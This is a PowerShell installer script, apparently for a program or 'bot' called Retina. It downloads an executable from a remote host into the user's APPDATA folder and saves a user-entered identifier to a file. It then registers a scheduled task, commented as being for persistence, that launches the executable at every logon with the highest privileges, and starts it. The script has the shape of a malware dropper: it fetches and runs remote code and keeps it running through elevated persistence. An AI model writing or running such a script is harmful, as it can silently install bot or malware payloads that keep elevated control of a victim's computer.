$url = "https://retina.danihere.xyz/r207/sysretina.exe" $dir = "$env:APPDATA\retina" $exe = "$dir\sysretina.exe" Write-Host "Downloading Retina" -ForegroundColor Cyan cd $env:APPDATA mkdir retina cd retina curl.exe -O $url $outputFile = "retina_identifier.txt" # Get input from the user $userInput = Read-Host -Prompt "Enter the text you want to save" # Write the string to the file (creates the file if it doesn't exist) Set-Content -Path $outputFile -Value $userInput if (Test-Path $exe) { # Create scheduled task for persistence schtasks /create /tn "retina Startup" /tr "'$exe'" /sc ONLOGON /rl HIGHEST /f > $null # Start the bot Start-Process -FilePath $exe Write-Host "Installation completed successfully!" -ForegroundColor Green } else { Write-Host "Installation failed - executable not found" -ForegroundColor Red }